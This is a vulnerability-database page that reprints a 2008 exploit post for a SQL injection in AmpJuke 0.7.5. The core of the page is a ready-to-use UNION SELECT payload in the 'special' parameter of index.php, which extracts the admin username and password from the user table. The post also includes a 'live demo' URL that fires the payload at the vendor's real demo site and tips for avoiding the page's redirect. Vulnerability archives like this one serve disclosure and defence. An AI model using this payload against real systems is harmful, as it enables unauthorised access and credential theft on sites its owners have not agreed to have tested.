Lucene search
K

AmpJuke version 0.7.5 suffers from a remote SQL injection vulnerability

🗓️ 05 Oct 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 23 Views

AmpJuke 0.7.5 SQL injection vulnerability in performeri

Code

                                                ############################################################
|-------------------------(S_DLA_S)-------------------------
|
|    Script : AmpJuke 0.7.5
|    Vuln. Type : SQL Injection
|    Founded By : S_DLA_S Th3 1r4Q1 Cr4Ck3r
|    CoNt4Ct : sdlas[at]Hotmail[d0t]Fr
|    Home : wWw.Iq-Ty.CoM | WwW.SdlaS-IQ.Co.CC
|
#############################################################

Th3 eXpl0T :
WwW.[Target].co.il/[script]/index.php?what=performerid&start=0&count='20&special=-2/**/UNION/**/SELECT/**/1,concat(name,0x3A7C3A,password)/**/FROM/**/user/**/WHERE/**/id=1/*

ps 1: Th3 Admin's Username And Pass Will Show up In The Title
like username:|:password

ps 2: Th3 pass will Sh0w up N0t encrypted lo0olz

L!v3 D3m0 :
http://www.ampjuke.org/ampjukedemo/index.php?what=performerid&start=0&count='20&special=-2/**/UNION/**/SELECT/**/1,concat(name,0x3A7C3A,password)/**/FROM/**/user/**/WHERE/**/id=1/*

Notice :
1.Th3 Admin's Username And Pass Will Show up In The Title
like username:|:password
2.Th3 pass will Sh0w up N0t encrypted lo0olz
3.Stop Th3 page Before it's Fully loaded Cuz U will Be redirected or Disable Java Script

################################################################
|---------------------------(S_DLA_S)---------------------------
| Gr33tz 2 All Th3 M3mb3rz Of : WwW.Iq-Ty.c0M | wWw.TryAg.cc/cc
| Gr33tz 2: H-T Team specially Houssamix | Hussin-X | str0ke
| Karar Alshame | Cyber-Zone | All Muslim H4Ck3rz
|                             I am IRAQI
################################################################
_________________________________________________________________
Sur Windows Live Ideas, d閏ouvrez en exclusivit?de nouveaux services en ligne... si nouveaux qu'ils ne sont pas encore sortis officiellement sur le march?!
http://ideas.live.com
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Oct 2008 00:00Current
7.1High risk
Vulners AI Score7.1
23